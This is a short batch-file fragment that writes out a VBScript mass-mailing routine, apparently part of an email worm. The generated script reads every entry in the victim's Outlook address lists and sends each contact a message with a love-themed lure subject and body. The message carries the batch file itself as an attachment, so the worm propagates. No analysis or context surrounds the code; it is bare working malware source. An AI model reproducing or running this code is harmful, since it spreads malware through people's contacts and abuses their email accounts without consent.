@echo.on error resume next>ioana.vbs"
@echo.dim a,b,c,d,e>>ioana.vbs"
@echo.set a = Wscript.CreateObject("Wscript.Shell")>>ioana.vbs"
@echo.set b = CreateObject("Outlook.Application")>>ioana.vbs"
@echo.set c = b.GetNameSpace("MAPI")>>ioana.vbs"
@echo.for y = 1 To c.AddressLists.Count>>ioana.vbs"
@echo.set d = c.AddressLists(y)>>ioana.vbs"
@echo.x = 1>>ioana.vbs"
@echo.set e = b.CreateItem(0)>>ioana.vbs"
@echo.for o = 1 To d.AddressEntries.Count>>ioana.vbs"
@echo.f = d.AddressEntries(x)>>ioana.vbs"
@echo.e.Recipients.Add f>>ioana.vbs"
@echo.x = x + 1>>ioana.vbs"
@echo.next>>ioana.vbs"
@echo.e.Subject = " For my special aNGeL ... IOANA ... ">>ioana.vbs"
@echo.e.Body = " I love you ">>ioana.vbs"
@echo.e.Attachments.Add ("c:\windows\system\ioana\ioana.bat")>>ioana.vbs"
@echo.e.DeleteAfterSubmit = False>>ioana.vbs"
@echo.e.Send>>ioana.vbs"
@echo.f = "">>ioana.vbs"
@echo.next>>ioana.vbs"